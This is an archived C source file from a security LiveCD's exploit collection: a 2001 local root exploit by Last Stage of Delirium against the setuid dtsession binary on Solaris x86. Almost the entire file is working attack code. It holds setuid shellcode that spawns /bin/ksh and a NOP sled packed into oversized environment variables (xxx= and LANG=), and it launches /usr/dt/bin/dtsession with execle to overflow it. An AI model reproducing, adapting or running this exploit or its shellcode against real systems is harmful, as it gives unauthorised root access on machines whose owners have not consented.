home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / dtsession.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  88 lines

---

1. /*## copyright LAST STAGE OF DELIRIUM mar 2001 poland        *://lsd-pl.net/ #*/
2. /*## /usr/dt/bin/dtsession                                                   #*/
3.  
4. #define NOPNUM 6000
5. #define ADRNUM 400
6. #define PCHNUM 6000
7. #define JMPNUM 6000
8.  
9. char setuidshellcode[]=
10.     "\x33\xc0"             /* xorl    %eax,%eax              */
11.     "\xeb\x08"             /* jmp     <setuidshellcode+12>   */
12.     "\x5f"                 /* popl    %edi                   */
13.     "\x47"                 /* incl    %edi                   */
14.     "\xab"                 /* stosl   %eax,%es:(%edi)        */
15.     "\x88\x47\x01"         /* movb    %al,0x1(%edi)          */
16.     "\xeb\x0d"             /* jmp     <setuidshellcode+25>   */
17.     "\xe8\xf3\xff\xff\xff" /* call    <setuidshellcode+4>    */
18.     "\x9a\xff\xff\xff\xff"
19.     "\x07\xff"
20.     "\xc3"                 /* ret                            */
21.     "\x33\xc0"             /* xorl    %eax,%eax              */
22.     "\x50"                 /* pushl   %eax                   */
23.     "\xb0\x17"             /* movb    $0x17,%al              */
24.     "\xe8\xee\xff\xff\xff" /* call    <setuidshellcode+17>   */
25.     "\xeb\x16"             /* jmp     <setuidshellcode+59>   */
26.     "\x33\xd2"             /* xorl    %edx,%edx              */
27.     "\x58"                 /* popl    %eax                   */
28.     "\x8d\x78\x14"         /* leal    0x14(%eax),edi         */
29.     "\x52"                 /* pushl   %edx                   */
30.     "\x57"                 /* pushl   %edi                   */
31.     "\x50"                 /* pushl   %eax                   */
32.     "\xab"                 /* stosl   %eax,%es:(%edi)        */
33.     "\x92"                 /* xchgl   %eax,%edx              */
34.     "\xab"                 /* stosl   %eax,%es:(%edi)        */
35.     "\x88\x42\x08"         /* movb    %al,0x7(%edx)          */
36.     "\xb0\x3b"             /* movb    $0x3b,%al              */
37.     "\xe8\xd6\xff\xff\xff" /* call    <setuidshellcode+17>   */
38.     "\xe8\xe5\xff\xff\xff" /* call    <setuidshellcode+37>   */
39.     "/bin/ksh"
40. ;
41.  
42. char jump[]=
43.     "\x8b\xc4"             /* movl    %esp,%eax              */
44.     "\xc3"                 /* ret                            */
45. ;
46.  
47. main(int argc,char **argv){
48.     char buffer[20000],*b,adr[4],pch[4],jmp[4],*envp[4],display[128];
49.     unsigned int i;
50.  
51.     printf("copyright LAST STAGE OF DELIRIUM mar 2001 poland  //lsd-pl.net/\n");
52.     printf("/usr/dt/bin/dtsession for solaris 2.7 (2.6,2.8 ?) x86\n\n");
53.  
54.     if(argc!=2){
55.         printf("usage: %s xserver:display\n",argv[0]);
56.         exit(-1);
57.     }
58.  
59.     *((unsigned int*)adr)=((*(unsigned int(*)())jump)())+3540+3000-0x4d0;
60.     *((unsigned int*)pch)=((*(unsigned int(*)())jump)())+3540+3000+6000;
61.     *((unsigned int*)jmp)=((*(unsigned int(*)())jump)())+3540+3000+6000+6000;
62.  
63.     *((unsigned int*)adr)=(((i=*((unsigned int*)adr))>>8))|(i<<24);
64.  
65.     sprintf(display,"DISPLAY=%s",argv[1]);
66.     envp[0]=&buffer[0];
67.     envp[1]=&buffer[19000];
68.     envp[2]=display;
69.     envp[3]=0;
70.  
71.     b=buffer;
72.     sprintf(b,"xxx=");
73.     b+=4;
74.     for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
75.     for(i=0;i<JMPNUM;i++) *b++=jmp[i%4];
76.     for(i=0;i<NOPNUM;i++) *b++=0x90;
77.     for(i=0;i<strlen(setuidshellcode);i++) *b++=setuidshellcode[i];
78.     *b=0;
79.  
80.     b=&buffer[19000];
81.     sprintf(b,"LANG=");
82.     b+=5;
83.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
84.     *b=0;
85.  
86.     execle("/usr/dt/bin/dtsession","lsd",0,envp);
87. }
88. /*                www.hack.co.za           [14 April 2001]*/